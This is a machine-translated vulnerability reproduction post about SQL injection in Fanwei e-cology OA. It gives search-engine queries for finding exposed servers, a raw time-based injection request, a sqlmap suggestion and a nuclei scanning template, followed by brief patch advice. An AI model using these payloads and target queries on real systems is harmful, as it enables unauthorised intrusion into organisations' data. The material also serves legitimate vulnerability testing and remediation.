【脆弱性再発】Fanwei e-cologyフロントデスクSQLインジェクションの脆弱性

情報 2023-09-03 14:06:11 訪問数: null

0x01 読書メモ

Tianqing Attack and Defense Laboratory の技術記事は参考用であり、この記事で提供される情報は、ネットワーク セキュリティ担当者が責任を負う Web サイト、サーバーなど (これらに限定されない) をテストまたは保守するためだけに提供されます。記事内の技術情報は、あらゆるコンピュータ システムへの侵入に使用されますので、無断で使用しないでください。本記事で提供する情報を利用したことによって生じた直接的または間接的な結果および損失は利用者ご自身が負担するものとします。この記事で提供されているツールは学習のみを目的としており、それ以外の使用は禁止されています。

0x02 脆弱性の説明

(1) ファンウェイ電子コロジー

Fanwei e-cology は、Fanwei Network Technology が開発した共同管理プラットフォームで、人事、財務、管理、モバイル オフィスの多機能管理をサポートします。この脆弱性は、Fanwei e-cology がユーザー入力を効果的にフィルタリングせず、SQL クエリ ステートメントに直接接続したため、システムに SQL インジェクションの脆弱性が発生したことが原因です。

FOFA 構文:

app.name=="泛微 e-cology 9.0 OA"

ハンター構文:

app.name="泛微 e-cology 9.0 OA"app.name="泛微 e-cology OA"


(2) 脆弱性 poc

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveReferer: 127.0.0.1:9999/wui/index.htmlContent-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.9Content-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

sqlmapを使用して注入する

核スキャンスクリプト

ソース: https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

id: ecology-oa-filedownloadforoutdoc-sqliinfo:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqlirequests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {
   
   {Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close                fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

Knowledge Planet でさらなる脆弱性 POC がリリース

  

 地球に関する最近のテーマと、地球内のツールのデモンストレーション

Inner Planet メンバーの発送

Web セキュリティの脆弱性に関する最新の 1 日の共有脆弱性マイニング スキルの共有

   惑星に参加して、ナレッジプラネットAPPで天慶攻防研究所を検索してください。さらにエキサイティングなので、ご期待ください

0x03 修復計画

公式修正による緩和策

パッチリンク

  • 修理の提案

公式は修復提案を発表し、影響を受けるユーザーにはできるだけ早く最新バージョンのパッチ v10.58.0 にアップグレードすることを推奨しています。

ダウンロード アドレス: https://www.weaver.com.cn/cs/securityDownload.asp#

おすすめ

転載: blog.csdn.net/2301_79099363/article/details/131692158
おすすめ
openKylinコミュニティ生態委員会の第6回会議が無事に開催されました
Alibaba Cloud、Tongyi Qianwen 2.5を正式リリース
Python 3.13 が最初のベータ版をリリース: 実験的なフリー スレッド モードと JIT、改善された対話型インタープリター
Stack Overflow は私のコードを使用して大規模な AI モデルをトレーニングし、私のアカウントを禁止しました。
Pop!_OS の COSMIC デスクトップが App Store のリストに掲載される
レポート: Django は依然として 74% の開発者にとって第一の選択肢です
「2024年第1四半期のインターネット投融資業務」調査レポート
15 年前、彼は「FFmpeg 恥の柱」に立っていたのに、今でも私たちに感謝しなければなりません - Tencent QQPlayer はその恥を晴らしますか?
ランキング
ブルーブリッジカップクロップハイブリッド(再帰的)
java线程、线程池
关于毕业前后的道路
JVMの基本
OpenCV ヒストグラムの原理と表示、マスキング、イコライゼーション、適応イコライゼーション
PHPのAES暗号化と復号化、MCRYPT_ENCRYPTとopenssl_encrypt
スコアボードを回転poj3335
Vueで要求されたデータ:タイムスタンプ変換時間
Javaの合併のpng画像
HttpServletResponseアプリケーションリクエストのリダイレクト
アーカイブ
もっと
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)

コードワールド

© 2018 codetd.com